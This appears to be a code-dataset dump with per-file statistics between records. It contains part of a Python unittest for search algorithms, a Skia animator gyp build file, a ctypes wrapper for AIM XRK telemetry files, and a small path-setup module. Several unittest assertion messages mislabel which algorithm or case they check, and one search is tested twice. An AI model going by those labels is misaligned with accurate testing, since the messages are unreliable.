self.assertEqual(self.arr[BinarySearch.binarySearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Binary Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Jump Search")
self.assertEqual(self.arr[ExponentialSearch.exponentialSearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Exponential Search")
self.assertEqual(self.arr[TernarySearch.ternarySearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Ternary Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Jump Search")
self.assertEqual(self.arr[FibonacciSearch.fibonacciSearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Fibonacci Search")
def test_first_third_value(self):
self.assertEqual(self.arr[LinearSearch.linearSearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[BinarySearch.binarySearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[ExponentialSearch.exponentialSearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[TernarySearch.ternarySearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Jump Search")
self.assertEqual(self.arr[FibonacciSearch.fibonacciSearch(self.arr, self.arr[len(self.arr) // 3])], self.arr[len(self.arr) // 3], "test_last_value - Fibonacci Search")
def test_second_third_value(self):
self.assertEqual(self.arr[LinearSearch.linearSearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[BinarySearch.binarySearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[ExponentialSearch.exponentialSearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[TernarySearch.ternarySearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Jump Search")
self.assertEqual(self.arr[FibonacciSearch.fibonacciSearch(self.arr, self.arr[2 * len(self.arr) // 3])], self.arr[2 * len(self.arr) // 3], "test_last_value - Fibonacci Search")
def test_not_in_arr_lower(self):
self.assertEqual(LinearSearch.linearSearch(self.arr, -500), -1, "test_not_in_arr_lower - Linear Search")
self.assertEqual(BinarySearch.binarySearch(self.arr, -500), -1, "test_not_in_arr_lower - Binary Search")
self.assertEqual(JumpSearch.jumpSearch(self.arr, -500), -1, "test_not_in_arr_lower - Jump Search")
self.assertEqual(ExponentialSearch.exponentialSearch(self.arr, -500), -1, "test_not_in_arr_lower - Exponential Search")
self.assertEqual(TernarySearch.ternarySearch(self.arr, -500), -1, "test_not_in_arr_lower - Ternary Search")
self.assertEqual(JumpSearch.jumpSearch(self.arr, -500), -1, "test_not_in_arr_lower - Jump Search")
self.assertEqual(FibonacciSearch.fibonacciSearch(self.arr, -500), -1, "test_not_in_arr_lower - Fibonacci Search")
def test_not_in_arr_higher(self):
self.assertEqual(LinearSearch.linearSearch(self.arr, 500), -1, "test_not_in_arr_higher - Linear Search")
self.assertEqual(BinarySearch.binarySearch(self.arr, 500), -1, "test_not_in_arr_higher - Binary Search")
self.assertEqual(JumpSearch.jumpSearch(self.arr, 500), -1, "test_not_in_arr_higher - Jump Search")
self.assertEqual(ExponentialSearch.exponentialSearch(self.arr, 500), -1, "test_not_in_arr_higher - Exponential Search")
self.assertEqual(TernarySearch.ternarySearch(self.arr, 500), -1, "test_not_in_arr_higher - Ternary Search")
self.assertEqual(JumpSearch.jumpSearch(self.arr, 500), -1, "test_not_in_arr_higher - Jump Search")
self.assertEqual(FibonacciSearch.fibonacciSearch(self.arr, 500), -1, "test_not_in_arr_higher - Fibonacci Search")
| 94.833333
| 184
| 0.712586
| 1,039
| 7,397
| 4.940327
| 0.076997
| 0.235924
| 0.081824
| 0.120008
| 0.872394
| 0.870251
| 0.870251
| 0.854276
| 0.854276
| 0.815508
| 0
| 0.020983
| 0.136677
| 7,397
| 78
| 185
| 94.833333
| 0.782806
| 0.029877
| 0
| 0.125
| 0
| 0
| 0.196682
| 0.041957
| 0
| 0
| 0
| 0
| 0.65625
| 1
| 0.109375
| false
| 0
| 0.140625
| 0
| 0.265625
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
32e0a7273a06f60e0d330fe4f0b4ea4ce6f07d71
| 9,419
|
gyp
|
Python
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | 20
|
2015-03-15T22:42:36.000Z
|
2021-04-28T21:34:05.000Z
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | 1
|
2017-01-19T05:40:33.000Z
|
2017-01-19T05:40:33.000Z
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | null | null | null |
#Animator is basically Skia's (much saner) version of Flash.
#On top of Views it provides a declarative UI model which can be updated
#based on events which trigger changes or scripts.
{
'includes': [
'common.gypi',
],
'targets': [
{
'target_name': 'animator',
'type': 'static_library',
'include_dirs': [
'../deps/skia/include/config',
'../deps/skia/include/core',
'../deps/skia/include/effects',
'../deps/skia/include/animator',
'../deps/skia/include/views',
'../deps/skia/include/xml',
'../deps/skia/include/utils',
'../deps/skia/include/images',
'../deps/skia/src/utils',
],
'sources': [
'../deps/skia/include/animator/SkAnimator.h',
'../deps/skia/include/animator/SkAnimatorView.h',
'../deps/skia/src/animator/SkAnimate.h',
'../deps/skia/src/animator/SkAnimateActive.cpp',
'../deps/skia/src/animator/SkAnimateActive.h',
'../deps/skia/src/animator/SkAnimateBase.cpp',
'../deps/skia/src/animator/SkAnimateBase.h',
'../deps/skia/src/animator/SkAnimateField.cpp',
'../deps/skia/src/animator/SkAnimateMaker.cpp',
'../deps/skia/src/animator/SkAnimateMaker.h',
'../deps/skia/src/animator/SkAnimateProperties.h',
'../deps/skia/src/animator/SkAnimateSet.cpp',
'../deps/skia/src/animator/SkAnimateSet.h',
'../deps/skia/src/animator/SkAnimator.cpp',
'../deps/skia/src/animator/SkAnimatorScript.cpp',
'../deps/skia/src/animator/SkAnimatorScript.h',
#'../deps/skia/src/animator/SkAnimatorScript2.cpp', fails on windows
#'../deps/skia/src/animator/SkAnimatorScript2.h',
'../deps/skia/src/animator/SkBoundable.cpp',
'../deps/skia/src/animator/SkBoundable.h',
'../deps/skia/src/animator/SkBuildCondensedInfo.cpp',
#'../deps/skia/src/animator/SkCondensedDebug.cpp', fails on windows
#'../deps/skia/src/animator/SkCondensedRelease.cpp',
'../deps/skia/src/animator/SkDisplayable.cpp',
'../deps/skia/src/animator/SkDisplayable.h',
'../deps/skia/src/animator/SkDisplayAdd.cpp',
'../deps/skia/src/animator/SkDisplayAdd.h',
'../deps/skia/src/animator/SkDisplayApply.cpp',
'../deps/skia/src/animator/SkDisplayApply.h',
'../deps/skia/src/animator/SkDisplayBounds.cpp',
'../deps/skia/src/animator/SkDisplayBounds.h',
'../deps/skia/src/animator/SkDisplayEvent.cpp',
'../deps/skia/src/animator/SkDisplayEvent.h',
'../deps/skia/src/animator/SkDisplayEvents.cpp',
'../deps/skia/src/animator/SkDisplayEvents.h',
'../deps/skia/src/animator/SkDisplayInclude.cpp',
'../deps/skia/src/animator/SkDisplayInclude.h',
'../deps/skia/src/animator/SkDisplayInput.cpp',
'../deps/skia/src/animator/SkDisplayInput.h',
'../deps/skia/src/animator/SkDisplayList.cpp',
'../deps/skia/src/animator/SkDisplayList.h',
'../deps/skia/src/animator/SkDisplayMath.cpp',
'../deps/skia/src/animator/SkDisplayMath.h',
'../deps/skia/src/animator/SkDisplayMovie.cpp',
'../deps/skia/src/animator/SkDisplayMovie.h',
'../deps/skia/src/animator/SkDisplayNumber.cpp',
'../deps/skia/src/animator/SkDisplayNumber.h',
'../deps/skia/src/animator/SkDisplayPost.cpp',
'../deps/skia/src/animator/SkDisplayPost.h',
'../deps/skia/src/animator/SkDisplayRandom.cpp',
'../deps/skia/src/animator/SkDisplayRandom.h',
'../deps/skia/src/animator/SkDisplayScreenplay.cpp',
'../deps/skia/src/animator/SkDisplayScreenplay.h',
'../deps/skia/src/animator/SkDisplayType.cpp',
'../deps/skia/src/animator/SkDisplayType.h',
'../deps/skia/src/animator/SkDisplayTypes.cpp',
'../deps/skia/src/animator/SkDisplayTypes.h',
'../deps/skia/src/animator/SkDisplayXMLParser.cpp',
'../deps/skia/src/animator/SkDisplayXMLParser.h',
'../deps/skia/src/animator/SkDraw3D.cpp',
'../deps/skia/src/animator/SkDraw3D.h',
'../deps/skia/src/animator/SkDrawable.cpp',
'../deps/skia/src/animator/SkDrawable.h',
'../deps/skia/src/animator/SkDrawBitmap.cpp',
'../deps/skia/src/animator/SkDrawBitmap.h',
'../deps/skia/src/animator/SkDrawBlur.cpp',
'../deps/skia/src/animator/SkDrawBlur.h',
'../deps/skia/src/animator/SkDrawClip.cpp',
'../deps/skia/src/animator/SkDrawClip.h',
'../deps/skia/src/animator/SkDrawColor.cpp',
'../deps/skia/src/animator/SkDrawColor.h',
'../deps/skia/src/animator/SkDrawDash.cpp',
'../deps/skia/src/animator/SkDrawDash.h',
'../deps/skia/src/animator/SkDrawDiscrete.cpp',
'../deps/skia/src/animator/SkDrawDiscrete.h',
'../deps/skia/src/animator/SkDrawEmboss.cpp',
'../deps/skia/src/animator/SkDrawEmboss.h',
'../deps/skia/src/animator/SkDrawExtraPathEffect.cpp',
'../deps/skia/src/animator/SkDrawFull.cpp',
'../deps/skia/src/animator/SkDrawFull.h',
'../deps/skia/src/animator/SkDrawGradient.cpp',
'../deps/skia/src/animator/SkDrawGradient.h',
'../deps/skia/src/animator/SkDrawGroup.cpp',
'../deps/skia/src/animator/SkDrawGroup.h',
'../deps/skia/src/animator/SkDrawLine.cpp',
'../deps/skia/src/animator/SkDrawLine.h',
'../deps/skia/src/animator/SkDrawMatrix.cpp',
'../deps/skia/src/animator/SkDrawMatrix.h',
'../deps/skia/src/animator/SkDrawOval.cpp',
'../deps/skia/src/animator/SkDrawOval.h',
'../deps/skia/src/animator/SkDrawPaint.cpp',
'../deps/skia/src/animator/SkDrawPaint.h',
'../deps/skia/src/animator/SkDrawPath.cpp',
'../deps/skia/src/animator/SkDrawPath.h',
'../deps/skia/src/animator/SkDrawPoint.cpp',
'../deps/skia/src/animator/SkDrawPoint.h',
'../deps/skia/src/animator/SkDrawRectangle.cpp',
'../deps/skia/src/animator/SkDrawRectangle.h',
'../deps/skia/src/animator/SkDrawSaveLayer.cpp',
'../deps/skia/src/animator/SkDrawSaveLayer.h',
'../deps/skia/src/animator/SkDrawShader.cpp',
'../deps/skia/src/animator/SkDrawShader.h',
'../deps/skia/src/animator/SkDrawText.cpp',
'../deps/skia/src/animator/SkDrawText.h',
'../deps/skia/src/animator/SkDrawTextBox.cpp',
'../deps/skia/src/animator/SkDrawTextBox.h',
'../deps/skia/src/animator/SkDrawTo.cpp',
'../deps/skia/src/animator/SkDrawTo.h',
'../deps/skia/src/animator/SkDrawTransparentShader.cpp',
'../deps/skia/src/animator/SkDrawTransparentShader.h',
'../deps/skia/src/animator/SkDump.cpp',
'../deps/skia/src/animator/SkDump.h',
'../deps/skia/src/animator/SkExtras.h',
'../deps/skia/src/animator/SkGetCondensedInfo.cpp',
'../deps/skia/src/animator/SkHitClear.cpp',
'../deps/skia/src/animator/SkHitClear.h',
'../deps/skia/src/animator/SkHitTest.cpp',
'../deps/skia/src/animator/SkHitTest.h',
'../deps/skia/src/animator/SkIntArray.h',
'../deps/skia/src/animator/SkMatrixParts.cpp',
'../deps/skia/src/animator/SkMatrixParts.h',
'../deps/skia/src/animator/SkMemberInfo.cpp',
'../deps/skia/src/animator/SkMemberInfo.h',
'../deps/skia/src/animator/SkOpArray.cpp',
'../deps/skia/src/animator/SkOpArray.h',
'../deps/skia/src/animator/SkOperand.h',
'../deps/skia/src/animator/SkOperand2.h',
'../deps/skia/src/animator/SkOperandInterpolator.h',
'../deps/skia/src/animator/SkOperandIterpolator.cpp',
'../deps/skia/src/animator/SkPaintParts.cpp',
'../deps/skia/src/animator/SkPaintParts.h',
'../deps/skia/src/animator/SkParseSVGPath.cpp',
'../deps/skia/src/animator/SkPathParts.cpp',
'../deps/skia/src/animator/SkPathParts.h',
'../deps/skia/src/animator/SkPostParts.cpp',
'../deps/skia/src/animator/SkPostParts.h',
'../deps/skia/src/animator/SkScript.cpp',
'../deps/skia/src/animator/SkScript.h',
'../deps/skia/src/animator/SkScript2.h',
'../deps/skia/src/animator/SkScriptCallBack.h',
'../deps/skia/src/animator/SkScriptDecompile.cpp',
'../deps/skia/src/animator/SkScriptRuntime.cpp',
'../deps/skia/src/animator/SkScriptRuntime.h',
'../deps/skia/src/animator/SkScriptTokenizer.cpp',
'../deps/skia/src/animator/SkSnapshot.cpp',
'../deps/skia/src/animator/SkSnapshot.h',
'../deps/skia/src/animator/SkTDArray_Experimental.h',
'../deps/skia/src/animator/SkTextOnPath.cpp',
'../deps/skia/src/animator/SkTextOnPath.h',
'../deps/skia/src/animator/SkTextToPath.cpp',
'../deps/skia/src/animator/SkTextToPath.h',
'../deps/skia/src/animator/SkTime.cpp',
'../deps/skia/src/animator/SkTypedArray.cpp',
'../deps/skia/src/animator/SkTypedArray.h',
'../deps/skia/src/animator/SkXMLAnimatorWriter.cpp',
'../deps/skia/src/animator/SkXMLAnimatorWriter.h',
],
'direct_dependent_settings': {
'include_dirs': [
'../deps/skia/include/animator',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
| 47.812183
| 76
| 0.622784
| 1,050
| 9,419
| 5.58
| 0.153333
| 0.22666
| 0.291005
| 0.499403
| 0.849633
| 0.129374
| 0.012289
| 0.012289
| 0
| 0
| 0
| 0.00116
| 0.176452
| 9,419
| 196
| 77
| 48.056122
| 0.754158
| 0.05404
| 0
| 0.049724
| 0
| 0
| 0.757249
| 0.746685
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5be0f998b9e90fdbadd854a281ac49e949340f1
| 16,276
|
py
|
Python
|
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | null | null | null |
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | 1
|
2020-07-14T09:27:54.000Z
|
2020-07-14T09:27:54.000Z
|
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | 1
|
2022-01-19T06:27:08.000Z
|
2022-01-19T06:27:08.000Z
|
# AIM XRK Wrapper Class
# Brian Acosta
# May 16th, 2018
#
#
# Distributed under creative commons beerware license:
# Free, but if you use it and we ever meet you buy me a beer.
#
from ctypes import *
import os
from xrk_util import *
class XRK():
def __init__(self, filename):
self.filename = filename
self.fileptr = file_pointer(self.filename)
self.idxf = aimXRK.open_file(self.fileptr.value)
self.channels = self.channel_list()
self.GPS_channels = self.GPS_channel_list()
self.GPS_raw_channels = self.GPS_raw_channel_list()
if not self.idxf > 0:
del self
def close(self):
success = aimXRK.close_file_i(self.idxf)
return (success > 0)
# returns a string of the vehicle name
def vehicle_name(self):
return c_char2Str(c_char_p(aimXRK.get_vehicle_name(self.idxf)))
# returns a string of the track name
def track_name(self):
return c_char2Str(c_char_p(aimXRK.get_track_name(self.idxf)))
# returns a string of the racer's name
def racer_name(self):
return c_char2Str(c_char_p(aimXRK.get_racer_name(self.idxf)))
# returns a string of the championship name
def championship_name(self):
return c_char2Str(c_char_p(aimXRK.get_championship_name(self.idxf)))
# returns a string of the venue type
def venue_type(self):
return c_char2Str(c_char_p(aimXRK.get_venue_type_name(self.idxf)))
# returns an integer lap count
def lap_count(self):
return aimXRK.get_laps_count(self.idxf)
# returns a list of the lap times in the given run
def lap_times_list(self):
laps = self.lap_count()
current_start = c_double(0)
current_duration = c_double(0)
lap_starts = []
lap_times = []
for i in range(laps):
aimXRK.get_lap_info(self.idxf, i, byref(current_start), byref(current_duration))
lap_starts.append(current_start.value)
lap_times.append(current_duration.value)
return lap_times
############################################################################
## REGULAR DATA CHANNEL MEHTODS
############################################################################
def channel_count(self):
return aimXRK.get_channels_count(self.idxf)
def channel_list(self):
channel_names = []
for i in range(self.channel_count()):
channel_i = c_char2Str(c_char_p(aimXRK.get_channel_name(self.idxf, i)))
channel_names.append(channel_i)
return channel_names
def channel_sample_count(self, channel_name):
try:
idxc = self.channels.index(channel_name)
return aimXRK.get_channel_samples_count(self.idxf, idxc)
except:
return 0
def channel_sample_count_by_index(self, idxc):
return aimXRK.get_channel_samples_count(self.idxf, idxc)
def channel_units(self, channel_name):
try:
idxc = self.channels.index(channel_name)
return c_char2Str(c_char_p(aimXRK.get_channel_units(self.idxf, idxc)))
except:
return 0
def channel_units_by_index(self, idxc):
return c_char2Str(c_char_p(aimXRK.get_channel_units(self.idxf, idxc)))
def channel_times_and_samples(self, channel_name):
idxc = self.channels.index(channel_name)
sample_count = self.channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def channel_times_and_samples_by_index(self, idxc):
sample_count = self.channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def lap_channel_sample_count(self, channel_name, lap_number):
idxl = lap_number - 1
try:
idxc = self.channels.index(channel_name)
return aimXRK.get_lap_channel_samples_count(self.idxf, idxl, idxc)
except:
return 0
def lap_channel_sample_count_by_index(self, idxc, lap_number):
idxl = lap_number - 1
return aimXRK.get_lap_channel_samples_count(self.idxf, idxl, idxc)
def lap_channel_times_and_samples(self, channel_name, lap_number):
idxc = self.channels.index(channel_name)
idxl = lap_number - 1
sample_count = self.lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def lap_channel_times_and_samples_by_index(self, idxc, lap_number):
idxl = lap_number - 1
sample_count = self.lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
############################################################################
## GPS DATA CHANNEL MEHTODS
############################################################################
def GPS_channel_count(self):
return aimXRK.get_GPS_channels_count(self.idxf)
def GPS_channel_list(self):
channel_names = []
for i in range(self.GPS_channel_count()):
channel_i = c_char2Str(c_char_p(aimXRK.get_GPS_channel_name(self.idxf, i)))
channel_names.append(channel_i)
return channel_names
def GPS_channel_sample_count(self, channel_name):
try:
idxc = self.GPS_channels.index(channel_name)
return aimXRK.get_GPS_channel_samples_count(self.idxf, idxc)
except:
return 0
def GPS_channel_sample_count_by_index(self, idxc):
return aimXRK.get_GPS_channel_samples_count(self.idxf, idxc)
def GPS_channel_units(self, channel_name):
try:
idxc = self.GPS_channels.index(channel_name)
return c_char2Str(c_char_p(aimXRK.get_GPS_channel_units(self.idxf, idxc)))
except:
return 0
def GPS_channel_units_by_index(self, idxc):
return c_char2Str(c_char_p(aimXRK.get_GPS_channel_units(self.idxf, idxc)))
def GPS_channel_times_and_samples(self, channel_name):
idxc = self.GPS_channels.index(channel_name)
sample_count = self.GPS_channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_GPS_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_channel_times_and_samples_by_index(self, idxc):
sample_count = self.GPS_channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_GPS_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_lap_channel_sample_count(self, channel_name, lap_number):
idxl = lap_number - 1
try:
idxc = self.GPS_channels.index(channel_name)
return aimXRK.get_lap_GPS_channel_samples_count(self.idxf, idxl, idxc)
except:
return 0
def GPS_lap_channel_sample_count_by_index(self, idxc, lap_number):
idxl = lap_number - 1
return aimXRK.get_lap_GPS_channel_samples_count(self.idxf, idxl, idxc)
def GPS_lap_channel_times_and_samples(self, channel_name, lap_number):
idxc = self.GPS_channels.index(channel_name)
idxl = lap_number - 1
sample_count = self.GPS_lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_GPS_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_lap_channel_times_and_samples_by_index(self, idxc, lap_number):
idxl = lap_number - 1
sample_count = self.GPS_lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_GPS_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
############################################################################
## RAW GPS DATA CHANNEL MEHTODS
############################################################################
def GPS_raw_raw_channel_count(self):
return aimXRK.get_GPS_raw_raw_channels_count(self.idxf)
def GPS_raw_channel_count(self):
return aimXRK.get_GPS_raw_channels_count(self.idxf)
def GPS_raw_channel_list(self):
channel_names = []
for i in range(self.GPS_raw_channel_count()):
channel_i = c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_name(self.idxf, i)))
channel_names.append(channel_i)
return channel_names
def GPS_raw_channel_sample_count(self, channel_name):
try:
idxc = self.GPS_raw_channels.index(channel_name)
return aimXRK.get_GPS_raw_channel_samples_count(self.idxf, idxc)
except:
return 0
def GPS_raw_channel_sample_count_by_index(self, idxc):
return aimXRK.get_GPS_raw_channel_samples_count(self.idxf, idxc)
def GPS_raw_channel_units(self, channel_name):
try:
idxc = self.GPS_raw_channels.index(channel_name)
return c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_units(self.idxf, idxc)))
except:
return 0
def GPS_raw_channel_units_by_index(self, idxc):
return c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_units(self.idxf, idxc)))
def GPS_raw_channel_times_and_samples(self, channel_name):
idxc = self.GPS_raw_channels.index(channel_name)
sample_count = self.GPS_raw_channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_GPS_raw_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_raw_channel_times_and_samples_by_index(self, idxc):
sample_count = self.GPS_raw_channel_sample_count_by_index(idxc)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_GPS_raw_channel_samples(self.idxf, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_raw_lap_channel_sample_count(self, channel_name, lap_number):
idxl = lap_number - 1
try:
idxc = self.GPS_raw_channels.index(channel_name)
return aimXRK.get_lap_GPS_raw_channel_samples_count(self.idxf, idxl, idxc)
except:
return 0
def GPS_raw_lap_channel_sample_count_by_index(self, idxc, lap_number):
idxl = lap_number - 1
return aimXRK.get_lap_GPS_raw_channel_samples_count(self.idxf, idxl, idxc)
def GPS_raw_lap_channel_times_and_samples(self, channel_name, lap_number):
idxc = self.GPS_raw_channels.index(channel_name)
idxl = lap_number - 1
sample_count = self.GPS_raw_lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_GPS_raw_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
def GPS_raw_lap_channel_times_and_samples_by_index(self, idxc, lap_number):
idxl = lap_number - 1
sample_count = self.GPS_raw_lap_channel_sample_count_by_index(idxc, lap_number)
times = []
samples = []
timeptr = (c_double * sample_count)()
sampleptr = (c_double * sample_count)()
success = aimXRK.get_lap_GPS_raw_channel_samples(self.idxf, idxl, idxc, byref(timeptr),
byref(sampleptr), sample_count)
for i in range(sample_count):
times.append(timeptr[i])
samples.append(sampleptr[i])
return [times, samples]
| 38.56872
| 97
| 0.571946
| 1,866
| 16,276
| 4.648982
| 0.05895
| 0.106513
| 0.049798
| 0.049798
| 0.884957
| 0.877233
| 0.863631
| 0.854525
| 0.830202
| 0.793314
| 0
| 0.004075
| 0.321578
| 16,276
| 422
| 98
| 38.56872
| 0.781561
| 0.031887
| 0
| 0.712375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.010033
| 0.053512
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd2fa74f9ba51d08437e66e84e5cde0152ba524b
| 106
|
py
|
Python
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 882
|
2017-11-29T20:42:58.000Z
|
2022-03-12T08:18:57.000Z
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 21
|
2017-12-01T05:30:39.000Z
|
2020-12-15T11:14:44.000Z
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 104
|
2018-01-20T07:12:31.000Z
|
2022-03-12T08:18:59.000Z
|
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.abspath(__file__), os.pardir)))
| 26.5
| 84
| 0.773585
| 19
| 106
| 4.105263
| 0.473684
| 0.230769
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 106
| 4
| 84
| 26.5
| 0.78
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
